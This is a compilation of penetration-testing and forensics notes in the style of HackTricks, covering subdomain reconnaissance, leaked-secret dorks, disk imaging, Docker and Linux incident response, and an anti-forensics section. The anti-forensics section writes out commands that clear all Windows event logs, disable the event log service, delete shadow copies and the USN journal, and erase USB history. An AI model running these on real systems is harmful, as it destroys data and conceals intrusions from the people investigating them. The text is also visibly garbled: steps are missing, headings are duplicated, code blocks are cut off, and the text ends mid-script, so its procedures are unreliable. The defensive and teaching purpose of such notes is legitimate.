If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
# Subdomains

> We know all the companies inside the scope, all the assets of each company and all the domains related to the companies.

It's time to find all the possible subdomains of each found domain.

## **DNS**

Let's try to get **subdomains** from the **DNS** records. We should also try a **Zone Transfer** (if vulnerable, you should report it).
```bash
dnsrecon -a -d tesla.com
```
## **OSINT**

The fastest way to obtain a lot of subdomains is to search in external sources. I'm not going to discuss which sources are the best and how to use them, but you can find several utilities here: [https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html)
You could also find subdomains by scraping web pages and parsing them (including JS files), searching for subdomains with [SubDomainizer](https://github.com/nsonaniya2010/SubDomainizer) or [subscraper](https://github.com/Cillian-Collins/subscraper).
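The core of those scrapers is a regex pass over fetched content. A minimal sketch (Python standard library only; the pattern is a hypothetical simplification of what the tools above use and misses some edge cases):

```python
import re

def find_subdomains(text: str, domain: str) -> set:
    """Extract <something>.<domain> hostnames from page/JS content."""
    # One or more DNS labels (letters, digits, dashes) ending in the target domain.
    pattern = re.compile(
        r"\b((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+" + re.escape(domain) + r")\b",
        re.IGNORECASE,
    )
    return {m.lower() for m in pattern.findall(text)}

js = 'var api = "https://api.dev.tesla.com/v1"; img.src = "//cdn.tesla.com/x.png";'
print(find_subdomains(js, "tesla.com"))
```

Run it over every response body (HTML and JS) you collect while crawling the target.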
## **RapidDNS**

Quickly find subdomains using the [RapidDNS](https://rapiddns.io) API (from [link](https://twitter.com/Verry\_\_D/status/1282293265597779968)):
```bash
rapiddns(){
  curl -s "https://rapiddns.io/subdomain/$1?full=1" \
  | grep -oP '_blank">\K[^<]*' \
  | grep -v http \
  | sort -u
}
```
## **Shodan**

You found **dev-int.bigcompanycdn.com**, make a Shodan query like the following:
* https://book.hacktricks.xyz/external-recon-methodology
## **DNS Brute force**

Let's try to find new **subdomains** by brute-forcing DNS servers using possible subdomain names.\
The most recommended tools for this are [**massdns**](https://github.com/blechschmidt/massdns)**,** [**gobuster**](https://github.com/OJ/gobuster)**,** [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) **and** [**shuffledns**](https://github.com/projectdiscovery/shuffledns). The first one is faster but more prone to errors (you should always check for **false positives**) and the second one **is more reliable** (always use gobuster).
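massdns expects one fully-qualified name per line, so the brute-force input is just wordlist × domain. A minimal sketch (Python standard library only) of building that input:

```python
def massdns_candidates(domains, wordlist):
    """Combine every wordlist entry with every target domain into FQDNs."""
    for domain in domains:
        for word in wordlist:
            word = word.strip().rstrip(".")
            if word:  # skip blank wordlist lines
                yield f"{word}.{domain}"

words = ["www", "dev", "mail", ""]
fqdns = list(massdns_candidates(["tesla.com"], words))
print(fqdns)
# → ['www.tesla.com', 'dev.tesla.com', 'mail.tesla.com']
```

You would then feed the resulting file to massdns along with your validated resolver list.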
Note how these tools require a **list of IPs of public DNSs**. If these public DNSs are malfunctioning (DNS poisoning for example) you will get bad results. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them.
## **VHosts / Virtual Hosts**

You can find some VHosts in IPs using [HostHunter](https://github.com/SpiderLabs/HostHunter)
With this technique you may even be able to access internal/hidden endpoints.
{% endhint %}
## **CORS Brute Force**

Sometimes you will find pages that only return the header _**Access-Control-Allow-Origin**_ when a valid domain/subdomain is set in the _**Origin**_ header. In these scenarios, you can abuse this behavior to **discover** new **subdomains**.
```bash
ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http://FUZZ.crossfit.htb' -mr "Access-Control-Allow-Origin" -ignore-body
```
## **DNS Brute Force v2**

Once you have finished looking for subdomains, you can use [**dnsgen**](https://github.com/ProjectAnte/dnsgen)**,** [**altdns**](https://github.com/infosec-au/altdns) and [**gotator**](https://github.com/Josue87/gotator) to generate possible permutations of the discovered subdomains, and then use **massdns** and **gobuster** again to search for new domains.
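A minimal sketch of the permutation idea behind dnsgen/altdns (Python standard library only; real tools apply many more mutation rules, and the word list here is illustrative):

```python
def permute(subdomain: str, domain: str, words=("dev", "staging", "admin", "01")):
    """Generate dnsgen-style permutations of a discovered subdomain."""
    prefix = subdomain[: -(len(domain) + 1)]          # "api.tesla.com" -> "api"
    labels = prefix.split(".")
    rest = ".".join(labels[1:] + [domain])            # everything after the first label
    out = set()
    for w in words:
        out.add(f"{w}.{subdomain}")                   # dev.api.tesla.com
        out.add(f"{w}-{labels[0]}.{rest}")            # dev-api.tesla.com
        out.add(f"{labels[0]}-{w}.{rest}")            # api-dev.tesla.com
    return sorted(out)

for candidate in permute("api.tesla.com", "tesla.com"):
    print(candidate)   # feed these back into massdns/gobuster
```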
## **Buckets Brute Force**

While looking for **subdomains**, keep an eye out for any **pointing** to any type of **bucket**, and in that case [**check the permissions**](../pentesting/pentesting-web/buckets/)**.**\
Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](../pentesting/pentesting-web/buckets/).
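Bucket-name brute forcing is again just keyword combination. A minimal sketch (Python standard library only; the keyword and separator lists are illustrative):

```python
from itertools import product

def bucket_candidates(company, keywords=("backup", "dev", "www", "assets"), seps=("", "-", ".")):
    """Generate plausible bucket names: company+keyword joined both ways."""
    names = set()
    for kw, sep in product(keywords, seps):
        names.add(f"{company}{sep}{kw}")
        names.add(f"{kw}{sep}{company}")
    return sorted(names)

for name in bucket_candidates("tesla", keywords=("backup", "dev")):
    # Each candidate would then be probed, e.g. https://<name>.s3.amazonaws.com
    print(name)
```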
## **Monitoring**

You can **monitor** whether **new subdomains** of a domain are created by monitoring the **Certificate Transparency** logs, as [**sublert**](https://github.com/yassineaboukir/sublert/blob/master/sublert.py) does.
## **Looking for vulnerabilities**

Check for possible [**subdomain takeovers**](../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\
If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../pentesting/pentesting-web/buckets/).
If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._

# Web servers hunting

> We have found all the companies and their assets and we know IP ranges, domains and subdomains inside the scope. It's time to search for web servers.
```bash
cat /tmp/domains.txt | httprobe #Test all domains inside the file for ports 80 and 443
cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check ports 80, 443, 8080 and 8443
```
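httprobe essentially expands each hostname into candidate URLs and keeps the ones that answer. A minimal sketch of the expansion step (Python standard library only; a real prober would then issue requests, e.g. with `urllib.request` and a short timeout):

```python
def probe_urls(hosts, extra_ports=(("http", 8080), ("https", 8443))):
    """Expand hostnames into the URLs a prober would try (default 80/443 + extras)."""
    for host in hosts:
        yield f"http://{host}"
        yield f"https://{host}"
        for scheme, port in extra_ports:
            yield f"{scheme}://{host}:{port}"

urls = list(probe_urls(["dev.tesla.com"]))
print(urls)
# → ['http://dev.tesla.com', 'https://dev.tesla.com',
#    'http://dev.tesla.com:8080', 'https://dev.tesla.com:8443']
```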
## **Screenshots**

Now that you have discovered **all the web servers** present in the scope (among the **IPs** of the company and all the **domains** and **subdomains**) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just by **taking a look** at the **main page** you can find **weird** endpoints that are more **prone** to be **vulnerable**.

To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), [**Aquatone**](https://github.com/michenriksen/aquatone), [**shutter**](https://shutter-project.org/downloads/) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.**
## Cloud Assets

Just with some **specific keywords** identifying the company it's possible to enumerate possible cloud assets belonging to them with tools like [**cloud\_enum**](https://github.com/initstring/cloud\_enum)**,** [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) **or** [**cloudlist**](https://github.com/projectdiscovery/cloudlist)**.**
# Recapitulation 1

> Congratulations! At this point you have already performed all the basic enumeration. Yes, it's basic because a lot more enumeration can be done (we will see more tricks later).\
> Did you know that BB experts recommend spending only 10-15 mins in this phase? But don't worry, once you have practice you will do this even faster than that.
Then, it's time for the real Bug Bounty hunt! In this methodology I'm **not going to talk about how to scan hosts** (you can see a [guide for that here](../pentesting/pentesting-network/)), how to use tools like Nessus or OpenVAS to perform a **vuln scan** or how to **look for vulnerabilities** in the open services (this book already contains tons of information about possible vulnerabilities on a lot of common services). **But, don't forget that if the scope allows it, you should give it a try.**

## GitHub leaked secrets

{% content-ref url="github-leaked-secrets.md" %}
[github-leaked-secrets.md](github-leaked-secrets.md)
You can also search for leaked secrets in all open repository platforms using: [https://searchcode.com/?q=auth\_key](https://searchcode.com/?q=auth\_key)

## [**Pentesting Web Methodology**](../pentesting/pentesting-web/)

Anyway, the **majority of the vulnerabilities** found by bug hunters reside in **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](../pentesting/pentesting-web/).

# Recapitulation 2

> Congratulations! The testing has finished! I hope you have found some vulnerabilities.
**If you have found any vulnerability thanks to this book, please reference the book in your write-up.**

## **Automatic Tools**

There are several tools out there that will perform part of the proposed actions against a given scope.
* [**https://github.com/six2dez/reconftw**](https://github.com/six2dez/reconftw)
* [**https://github.com/hackerspider1/EchoPwn**](https://github.com/hackerspider1/EchoPwn) - A little old and not updated

# **References**

* **All free courses of** [**@Jhaddix**](https://twitter.com/Jhaddix) **(like** [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)**)**
</details>
# GitHub Leaked Secrets
Now that we have built the list of assets of our scope, it's time to search for some OSINT low-hanging fruits.

## API key leaks in GitHub

* [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber)
* [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit)
* [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog)
* [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker)

## **Dorks**

```bash
".mlab.com password"
```

</details>

# Basic Forensic Methodology

{% hint style="danger" %}
Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**?\
[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**

We are going to talk about partitions, file-systems, carving, memory, logs, backups...

So whether you are doing a professional forensic analysis of some data or just playing a CTF, you can find useful and interesting tricks here.

# Creating and Mounting an Image

{% content-ref url="image-adquisition-and-mount.md" %}
[image-adquisition-and-mount.md](image-adquisition-and-mount.md)
{% endcontent-ref %}

# Malware Analysis

This **isn't necessarily the first step to perform once you have the image**. But you can use these malware analysis techniques independently if you have a file, a file-system image, a memory image, a pcap... so it's good to **keep these actions in mind**:
{% content-ref url="malware-analysis.md" %}
[malware-analysis.md](malware-analysis.md)
{% endcontent-ref %}

# Inspecting an Image

If you are given a **forensic image** of a device you can start **analyzing the partitions and the file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in:
Depending on the used OSs and even platform, different interesting artifacts should be searched.

{% content-ref url="docker-forensics.md" %}
[docker-forensics.md](docker-forensics.md)
{% endcontent-ref %}

# Deep inspection of specific file-types and Software

If you have a very **suspicious** **file**, then **depending on the file-type and software** that created it, several **tricks** may be useful.\
Read the following page to learn some interesting tricks:
I want to do a special mention to the page:

{% content-ref url="specific-software-file-type-tricks/browser-artifacts.md" %}
[browser-artifacts.md](specific-software-file-type-tricks/browser-artifacts.md)
{% endcontent-ref %}

# Memory Dump Inspection

{% content-ref url="memory-dump-analysis/" %}
[memory-dump-analysis](memory-dump-analysis/)
{% endcontent-ref %}
# Pcap Inspection

{% content-ref url="pcap-inspection/" %}
[pcap-inspection](pcap-inspection/)
{% endcontent-ref %}

# **Anti-Forensic Techniques**

Keep in mind the possible use of anti-forensic techniques:
{% content-ref url="anti-forensic-techniques.md" %}
[anti-forensic-techniques.md](anti-forensic-techniques.md)
{% endcontent-ref %}

# Threat Hunting

{% content-ref url="file-integrity-monitoring.md" %}
[file-integrity-monitoring.md](file-integrity-monitoring.md)
{% endcontent-ref %}
</details>

# Timestamps

An attacker may be interested in **changing the timestamps of files** to avoid being detected.\
It's possible to find the timestamps inside the MFT in the attributes `$STANDARD_INFORMATION` and `$FILE_NAME`.
Both attributes have 4 timestamps: **Modification**, **access**, **creation**, and **MFT registry modification**.

**Windows explorer** and other tools show the information from **`$STANDARD_INFORMATION`**.

## TimeStomp - Anti-forensic Tool

This tool **modifies** the timestamp information inside **`$STANDARD_INFORMATION`** **but** **not** the information inside **`$FILE_NAME`**. Therefore, it's possible to **identify** **suspicious** **activity**.

## Usnjrnl
The **USN Journal** (Update Sequence Number Journal), or Change Journal, is a feature of the Windows NT file system (NTFS) which **maintains a record of changes made to the volume**.\
It's possible to use the tool [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) to search for modifications of this record.

The previous image is the **output** shown by the **tool** where it can be observed that some **changes were performed** to the file.

## $LogFile

All metadata changes to a file system are logged to ensure the consistent recovery of critical file system structures after a system crash. This is called [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead\_logging).\
The logged metadata is stored in a file called “**$LogFile**”, which is found in the root directory of an NTFS file system.\
Using the same tool it's possible to identify **at which time the timestamps were modified**:

* MTIME: File's MFT registry modification
* RTIME: File's access time

## `$STANDARD_INFORMATION` and `$FILE_NAME` comparison

Another way to identify suspicious modified files would be to compare the times in both attributes looking for **mismatches**.

## Nanoseconds

**NTFS** timestamps have a **precision** of **100 nanoseconds**. Therefore, finding files with timestamps like 2010-10-10 10:10:**00.000:0000 is very suspicious**.
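You can get a feel for this full-precision idea on Linux with GNU `stat` (a loose analogue only; inspecting the NTFS `$STANDARD_INFORMATION` attribute itself needs tools like `istat` from The Sleuth Kit, and the demo path below is made up):

```bash
# GNU stat prints nanosecond-precision timestamps; a "natural" file has a
# noisy fractional part, while an all-zero fraction suggests a forged stamp
touch /tmp/ts_demo
stat -c '%y' /tmp/ts_demo    # e.g. 2022-05-01 13:41:36.123456789 +0100
```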
## SetMace - Anti-forensic Tool

This tool can modify both attributes `$STANDARD_INFORMATION` and `$FILE_NAME`. However, since Windows Vista a live OS is needed to modify this information.
# Data Hiding

NTFS uses a cluster as the minimum information size. That means that if a file occupies a cluster and a half, the **remaining half is never going to be used** until the file is deleted. Then, it's possible to **hide data in this slack space**.
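A quick back-of-the-envelope sketch of how much slack a file leaves (the 4096-byte cluster size is an assumption, the common NTFS default):

```bash
# 6000-byte file on 4096-byte clusters: 2 clusters allocated, 2192 bytes of slack
FILE_SIZE=6000; CLUSTER=4096
CLUSTERS=$(( (FILE_SIZE + CLUSTER - 1) / CLUSTER ))   # round up to whole clusters
SLACK=$(( CLUSTERS * CLUSTER - FILE_SIZE ))
echo "allocated=$((CLUSTERS * CLUSTER)) slack=$SLACK"   # allocated=8192 slack=2192
```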
There are tools like slacker that allow hiding data in this "hidden" space.

Then, it's possible to retrieve the slack space using tools like FTK Imager. Note that this kind of tool can save the content obfuscated or even encrypted.
# UsbKill

This is a tool that will **turn off the computer if any change in the USB** ports is detected.\
A way to discover this would be to inspect the running processes and **review each python script running**.
# Live Linux Distributions

These distros are **executed inside the RAM** memory. The only way to detect them is **in case the NTFS file-system is mounted with write permissions**. If it's mounted just with read permissions, it won't be possible to detect the intrusion.

# Secure Deletion

[https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization)

# Windows Configuration

It's possible to disable several Windows logging methods to make the forensics investigation much harder.
## Disable Timestamps - UserAssist

This is a registry key that maintains dates and hours when each executable was run by the user.

Disabling UserAssist requires two steps:

1. Set two registry keys, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` and `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, both to zero in order to signal that we want UserAssist disabled.
2. Clear your registry subtrees that look like `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>`.
## Disable Timestamps - Prefetch

This will save information about the applications executed with the goal of improving the performance of the Windows system. However, this can also be useful for forensics practices.

* Select Modify on each of these to change the value from 1 (or 3) to 0
* Restart
## Disable Timestamps - Last Access Time

Whenever a folder is opened from an NTFS volume on a Windows NT server, the system takes the time to **update a timestamp field on each listed folder**, called the last access time. On a heavily used NTFS volume, this can affect performance.

3. Look for `NtfsDisableLastAccessUpdate`. If it doesn't exist, add this DWORD and set its value to 1, which will disable the process.
4. Close the Registry Editor, and reboot the server.
## Delete USB History

All the **USB Device Entries** are stored in the Windows Registry under the **USBSTOR** registry key, which contains subkeys that are created whenever you plug a USB device into your PC or laptop. You can find this key here: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deleting this**, you will delete the USB history.\
You may also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) to be sure you have deleted them (and to delete them).

Another file that saves information about the USBs is the file `setupapi.dev.log` inside `C:\Windows\INF`. This should also be deleted.
## Disable Shadow Copies

**List** shadow copies with `vssadmin list shadowstorage`\
**Delete** them running `vssadmin delete shadow`

It's also possible to modify the configuration of which files are going to be copied in the shadow copy in the registry `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`
## Overwrite deleted files

* You can use a **Windows tool**: `cipher /w:C` This will tell cipher to remove any data from the available unused disk space inside the C drive.
* You can also use tools like [**Eraser**](https://eraser.heidi.ie)
## Delete Windows event logs

* Windows + R --> eventvwr.msc --> Expand "Windows Logs" --> Right click each category and select "Clear Log"
* `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"`
* `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }`
## Disable Windows event logs

* `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f`
* Inside the services section disable the service "Windows Event Log"
* `WEvtUtil.exe clear-log` or `WEvtUtil.exe cl`

## Disable $UsnJrnl

* `fsutil usn deletejournal /d c:`
</details>

# Container modification

There are suspicions that some docker container was compromised:
If you find that **some suspicious file was added**, you can access the container:

```bash
docker exec -it wordpress bash
```
# Image modifications

When you are given an exported docker image (probably in `.tar` format) you can use [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) to **extract a summary of the modifications**:
Then, you can **decompress** the image and **access the blobs** to search for suspicious files:

```bash
tar -xf image.tar
```
## Basic Analysis

You can get **basic information** from the image running:
```bash
dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers
```
## Dive

In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility:
```bash
tar -xf image.tar
for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done
```
# Credentials from memory

Note that when you run a docker container inside a host **you can see the processes running on the container from the host** just by running `ps -ef`
</details>

# Baseline

A baseline consists of taking a snapshot of certain parts of a system in order to **compare it with a future status to highlight changes**.

For example, you can calculate and store the hash of each file of the filesystem to be able to find out which files were modified.\
This can also be done with the user accounts created, processes running, services running and any other thing that shouldn't change much, or at all.
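A minimal sketch of the file-hashing idea (the paths are illustrative): hash a tree now, re-hash later, and diff the two lists to surface modified, added or removed files:

```bash
# Build a tiny tree and record its baseline hashes
mkdir -p /tmp/base_demo && echo 'v1' > /tmp/base_demo/app.conf
find /tmp/base_demo -type f -exec sha256sum {} + | sort -k2 > /tmp/baseline.txt
# Simulate tampering, then take a fresh snapshot
echo 'v2' > /tmp/base_demo/app.conf
find /tmp/base_demo -type f -exec sha256sum {} + | sort -k2 > /tmp/current.txt
diff /tmp/baseline.txt /tmp/current.txt    # the changed file shows up here
```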
## File Integrity Monitoring

File integrity monitoring is one of the most powerful techniques used to secure IT infrastructures and business data against a wide variety of both known and unknown threats.\
The goal is to generate a **baseline of all the files** that you want to monitor and then **periodically** **check** those files for possible **changes** (in the content, attributes, metadata...).

2\. **Real-time change notification**, which is typically implemented within or as an extension to the kernel of the operating system that will flag when a file is accessed or modified.
## Tools

* [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring)
* [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software)

# References

* [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)
</details>

# Acquisition

## DD
```bash
#This will generate a raw copy of the disk
dd if=/dev/sdb of=disk.img
```
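To get a feel for the raw-copy step without touching a real device, you can image a plain file standing in for `/dev/sdb` and confirm the copy is bit-identical by hashing both sides (all paths below are made up for the demo):

```bash
# Stand-in "device": 1 MiB of zeros instead of /dev/sdb
dd if=/dev/zero of=/tmp/fake_disk bs=1M count=1 2>/dev/null
# Raw copy, as above but with the stand-in paths
dd if=/tmp/fake_disk of=/tmp/disk.img bs=512 2>/dev/null
sha256sum /tmp/fake_disk /tmp/disk.img   # identical hashes => faithful raw copy
```

In a real acquisition you would hash the source device before imaging and compare it against the image's hash to document integrity.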
## dcfldd
```bash
#Raw copy with hashes along the way (more secure as it checks hashes while it's copying the data)
dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes
```
## FTK Imager

You can [**download the FTK imager from here**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1).
```bash
ftkimager /dev/sdb evidence --e01 --case-number 1 --evidence-number 1 --description 'A description' --examiner 'Your name'
```
## EWF

You can generate a disk image using the [**ewf tools**](https://github.com/libyal/libewf).
```bash
ewfacquire /dev/sdb
#Media characteristics: physical
#File format: encase6
#Compression method: deflate
#Compression level: fast
#Then use default values
#It will generate the disk image in the current directory
```
# Mount

## Several types

In **Windows** you can try to use the free version of Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) to **mount the forensics image**.
## Raw

```bash
#Get file type
file evidence.img
evidence.img: Linux rev 1.0 ext4 filesystem data, UUID=1031571c-f398-4bfb-a414-b
mount evidence.img /mnt
```
## EWF

```bash
#Get file type
file output/ewf1
output/ewf1: Linux rev 1.0 ext4 filesystem data, UUID=05acca66-d042-4ab2-9e9c-be
mount output/ewf1 -o ro,norecovery /mnt
```
## ArsenalImageMounter

It's a Windows application to mount volumes. You can download it here [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)

## Errors

* **`cannot mount /dev/loop0 read-only`** in this case you need to use the flags **`-o ro,norecovery`**
* **`wrong fs type, bad option, bad superblock on /dev/loop0, missing codepage or helper program, or other error.`** in this case the mount failed because the offset of the filesystem is different from that of the disk image. You need to find the sector size and the start sector:
</details>

# Initial Information Gathering

## Basic Information

First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get an Ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USB, and modify the env variables to use those binaries:
```bash
cat /etc/shadow #Unexpected data?
find /directory -type f -mtime -1 -print #Find files modified during the last day in the directory
```
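Note that `-mtime` counts in days; for minute granularity `find` has `-mmin`. A quick self-contained check (the demo directory is invented):

```bash
# -mtime -1 = modified in the last 24h; -mmin -1 = modified in the last minute
mkdir -p /tmp/find_demo && touch /tmp/find_demo/fresh
find /tmp/find_demo -type f -mmin -1 -print
```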
### Suspicious information

While obtaining the basic information you should check for weird things like:

* Check **registered logins** of users without a shell inside `/etc/passwd`
* Check for **password hashes** inside `/etc/shadow` for users without a shell
## Memory Dump

In order to obtain the memory of the running system it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\
In order to **compile** it you need to use the **exact same kernel** the victim machine is using.

LiME supports 3 **formats**: raw, padded and lime.

LiME can also be used to **send the dump via the network** instead of storing it on the system using something like: `path=tcp:4444`
## Disk Imaging

### Shutting down

First of all, you will need to **shut down the system**. This isn't always an option, as sometimes the system will be a production server that the company cannot afford to shut down.\
There are **2 ways** of shutting down the system, a **normal shutdown** and a **"pull the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but it will also allow the possible **malware** to **destroy evidence**. The "pull the plug" approach may carry **some information loss** (as we have already taken an image of the memory, not much info is going to be lost) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be **malware**, just execute the **`sync`** **command** on the system and pull the plug.
#### Taking an image of the disk ### Taking an image of the disk
It's important to note that **before connecting to your computer anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying the any information. It's important to note that **before connecting to your computer anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying the any information.
dcfldd if=<subject device> of=<image file> bs=512 hash=<algorithm> hashwindow=<chunk size> hashlog=<hash log file>
dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes
```
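After acquisition, it is common practice to verify that the image matches the source before working on it. A minimal sketch of that check, using throwaway demo files in `/tmp` instead of a real device (all paths here are made up for illustration):

```bash
# Demo only: /tmp paths stand in for a real subject device and acquired image.
src=/tmp/demo_subject.bin
img=/tmp/demo_pc.image

dd if=/dev/zero of="$src" bs=1024 count=4 2>/dev/null  # fabricate "evidence"
cp "$src" "$img"                                       # stands in for the dcfldd run

h_src=$(sha256sum "$src" | awk '{print $1}')
h_img=$(sha256sum "$img" | awk '{print $1}')

if [ "$h_src" = "$h_img" ]; then
    echo "image verified: $h_img"
else
    echo "HASH MISMATCH - image is not a faithful copy"
fi
```

In a real case you would compare the `hashlog` produced by dcfldd against a fresh hash of the image file, and record both in your chain-of-custody notes.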
## Disk Image pre-analysis

Imagine that you receive a disk image with no more data.
icat -i raw -f ext4 disk.img 16
ThisisTheMasterSecret
```
# Search for known Malware

## Modified System Files

Some Linux systems have a feature to **verify the integrity of many installed components**, providing an effective way to identify unusual or out-of-place files. For instance, `rpm -Va` on Linux is designed to verify all packages that were installed using the RedHat Package Manager.
dpkg --verify
debsums | grep -v "OK$" #apt-get install debsums
```
## Malware/Rootkit Detectors

Read the following page to learn about tools that can be useful to find malware:

[malware-analysis.md](malware-analysis.md)
{% endcontent-ref %}
# Search installed programs

## Package Manager

On Debian-based systems, the _**/var/lib/dpkg/status**_ file contains details about installed packages and the _**/var/log/dpkg.log**_ file records information when a package is installed.\
On RedHat and related Linux distributions, the **`rpm -qa --root=/mntpath/var/lib/rpm`** command will list the contents of an RPM database on a subject system.
cat /var/log/dpkg.log | grep installed
rpm -qa --root=/mntpath/var/lib/rpm
```
## Other

**Not all installed programs will be listed by the above commands** because some applications are not available as packages for certain systems and must be installed from source. Therefore, a review of locations such as _**/usr/local**_ and _**/opt**_ may reveal other applications that have been compiled and installed from source code.
find /sbin/ -exec dpkg -S {} \; | grep "no path found"
find /sbin/ -exec rpm -qf {} \; | grep "is not"
```
# Recover Deleted Running Binaries

![](<../../.gitbook/assets/image (641).png>)

# Inspect AutoStart locations

## Scheduled Tasks
```bash
cat /var/spool/cron/crontabs/*
ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/
```
## Services

It is extremely common for malware to entrench itself as a new, unauthorized service. Linux has a number of scripts that are used to start services as the computer boots. The initialization startup script _**/etc/inittab**_ calls other scripts such as rc.sysinit and various startup scripts under the _**/etc/rc.d/**_ directory, or _**/etc/rc.boot/**_ in some older versions. On other versions of Linux, such as Debian, startup scripts are stored in the _**/etc/init.d/**_ directory. In addition, some common services are enabled in _**/etc/inetd.conf**_ or _**/etc/xinetd/**_ depending on the version of Linux. Digital investigators should inspect each of these startup scripts for anomalous entries.
* _**/etc/systemd/system**_
* _**/etc/systemd/system/multi-user.target.wants/**_

## Kernel Modules

On Linux systems, kernel modules are commonly used as rootkit components of malware packages. Kernel modules are loaded when the system boots based on the configuration information in the `/lib/modules/$(uname -r)` and `/etc/modprobe.d` directories, and the `/etc/modprobe` or `/etc/modprobe.conf` file. These areas should be inspected for items related to malware.
## Other AutoStart Locations

There are several configuration files that Linux uses to automatically launch an executable when a user logs into the system, and they may contain traces of malware.

* _**\~/.bashrc**_, _**\~/.bash\_profile**_, _**\~/.profile**_ and _**\~/.config/autostart**_ are executed when the specific user logs in.
* _**/etc/rc.local**_ is traditionally executed after all the normal system services are started, at the end of the process of switching to a multiuser runlevel.
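On a mounted image, the user-level locations above can be swept with a simple loop. This is only a sketch: `MNT` and the planted files below are demo assumptions, not real artifacts.

```bash
# MNT stands in for the mount point of the subject filesystem (demo data below).
MNT=/tmp/demo_root_fs
mkdir -p "$MNT/home/bob/.config/autostart" "$MNT/etc"
printf '[Desktop Entry]\nExec=/tmp/implant\n' > "$MNT/home/bob/.config/autostart/evil.desktop"
echo '/opt/implant &' > "$MNT/etc/rc.local"

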